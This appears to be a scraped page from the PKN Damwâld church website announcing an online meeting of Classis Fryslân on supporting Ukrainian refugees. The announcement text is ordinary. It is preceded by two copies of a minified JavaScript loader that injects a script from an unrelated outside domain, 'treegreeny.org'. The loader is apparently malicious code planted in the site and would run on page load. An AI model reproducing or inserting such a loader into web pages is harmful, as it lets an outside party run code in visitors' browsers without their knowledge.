;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Online Ontmoeting Classis Fryslân - Uitwisselen over ondersteunen van vluchtelingen nu de oorlog in de Oekraïne langer duurt - PKN Damwâld

Online Ontmoeting Classis Fryslân – Uitwisselen over ondersteunen van vluchtelingen nu de oorlog in de Oekraïne langer duurt

Gepubliceerd op: vrijdag 3 juni 2022

Sinds de oorlog in de Oekraïne zo’n 100 dagen geleden begon, zijn veel diaconieën en vrijwilligers onvermoeibaar aan de slag om vluchtelingen op te vangen en te ondersteunen. Nu de zomer eraan komt en de oorlog nog niet ten einde komt, komen er nieuwe vragen naar boven. Over psychologische ondersteuning, over de vakantieperiode, kosten, en zo nog veel meer.

Daarom organiseert de classis Fryslân op 13 juni opnieuw een webinar,  om te horen over ervaringen en ideeën en om met elkaar uit te wisselen. Door elkaar te bevragen en van elkaar te leren kunnen we de vluchtelingen ook de komende maanden zo goed mogelijk ondersteunen. Doet u ook mee? Van harte uitgenodigd!

Met medewerking van: classisdominee Wim Beekman, Karel Jungheim, expert vluchtelingen bij de landelijke Protestantse Kerk, en de diverse kerkelijke gemeenten in Fryslân.

Aanmelden graag uiterlijk donderdag 9 juni via de scriba: classisfryslan@gmail.com.

U ontvangt dan ruim tevoren de link naar de bijeenkomst.